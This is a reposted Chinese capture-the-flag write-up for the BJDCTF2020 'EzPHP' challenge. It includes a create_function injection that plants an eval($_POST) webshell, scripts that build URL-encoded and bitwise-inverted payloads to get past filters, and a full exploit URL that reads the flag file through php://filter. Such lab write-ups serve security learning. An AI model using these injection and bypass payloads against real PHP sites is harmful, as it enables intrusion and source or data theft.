当前位置:   article > 正文

2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass

[bjdctf2020]ezphp

首先,本文借鉴的大老婆博客如下:
出题大佬博客,详细讲解了各种知识点
一位大佬的详细解题过程(偷懒,自己就不写了)

就简单写写(赋值粘贴)一些比较重要的知识点(×

create_function函数:
看似平平无常,却暗藏杀机

<?php
$myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\');
?>
  • 1
  • 2
  • 3

执行后,很明显有一句话注入,可以拿到权限

function myFunc($a, $b){
	return $a+$b;
}
eval($_POST['Y1ng']);//}
  • 1
  • 2
  • 3
  • 4

全局变量:$_REQUEST
$_REQUEST 详解
总结就是:
当同时get和post同一个变量时,post>get,所以post的值会覆盖get的值

由于找不到将数字和英文字母url编码的网址(全是不编码的),就自己写了一个:

from urllib import parse
a="666c6167"
index=0
for i in a:
    index=index+1
    if(index%2==0):
        print(i,end='')
    else :
        print("%",end='')
        print(i,end='')

print("\n")
b="lp;.;,;[;;'"
b=parse.quote(b)
print(b)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15

遇到两次的知识点:字符串取反后再url编码
这个可以绕过一些特别的过滤,是个好东西,代码如下:

<?php
$a="assert";
$a=urlencode(~$a);
print($a)."\n";
$b='php://filter/read=convert.base64-encode/resource=rea1fl4g.php';
$b=urlencode(~$b);
print($b)."\n";
$url="http://c56291a0-7cdc-4722-9875-364186d0101f.node4.buuoj.cn:81/?code=";
$paylod='(~'.$a.')'.'(~'.$b.');';
print($url.$paylod);
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

最后的payload:

http://5b46e78d-4fd8-47ec-b82f-dc63449b28ec.node4.buuoj.cn:81/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&file=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67[%61%72%67]=}require(~%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F);var_dump(get_defined_vars());//&%66%6c%61%67[%63%6f%64%65]=create_function
//
编码前:
get:http://5b46e78d-4fd8-47ec-b82f-dc63449b28ec.node4.buuoj.cn:81/1nD3x.php?debu=aqua_is_cute%0a&file=data://text/plain,debu_debu_aqua&shana[]=1&passwd[]=2&flag[arg]=}require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);//&flag[arg]=create_function
同时需要post:debu=1&file=1

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/900705
推荐阅读
相关标签
  

闽ICP备14008679号